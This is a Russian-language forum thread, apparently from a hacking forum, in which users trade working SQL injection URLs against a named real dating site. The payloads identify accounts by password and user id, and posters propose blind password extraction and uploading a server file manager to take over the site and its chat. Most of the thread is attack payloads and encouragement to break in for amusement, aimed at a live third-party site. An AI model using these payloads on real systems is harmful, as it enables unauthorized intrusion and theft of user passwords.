ANTICHAT — форум по информационной безопасности, OSINT и технологиям

и к чему ты это написал?

А ктому что можно попробовать сломать....

ну вот и пробуй сам.как сломаеш напишеш.

_http://dating.lifechat.ru/view.php?rand=1'
Но это уже не ко мне, а к ZaCo

__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•

зачем зако когда есть его замеситель =))))
http://dating.lifechat.ru/view.php?rand=99999999999+or+(pass=123)/*
выдаст юзера у кого пароль 123, проверил, все подходит.

http://dating.lifechat.ru/view.php?rand=99999999999+or+(id=442)+and(pass=123 )/*

если будешь перебирать все возможные пароли то ты получишь пароль от тестового аккаунта(он первый)? вдруг этот пароль еще куда нить подойдет, заметь пароли могут быть не только в цифромов виде, можешь еще помучаться с (ascii(substring(pass,0,1))<100
вообщем вариантов много, жалко union и select не пашут

Отлчино,а теперь можно попробовать взломать этот чат через сайт знакомств. Есть такая программа если ее залить на сервер то можно иметь полный доступ к серверу и чату: http://php.spb.ru/remview/

ну нехера себе, где достал, она же приватная и стоит 500$ ты крут. научи пользоваться....
ты ниибацо крут, тебе надо ты и ломай, тебе дали уязвимость, показали как пользоваться, сиди и ломай, этот чат никому нах не нужен, тока себя потешить

Так вот давайте потешимся.

кому нуда уже все потешились, дальше что?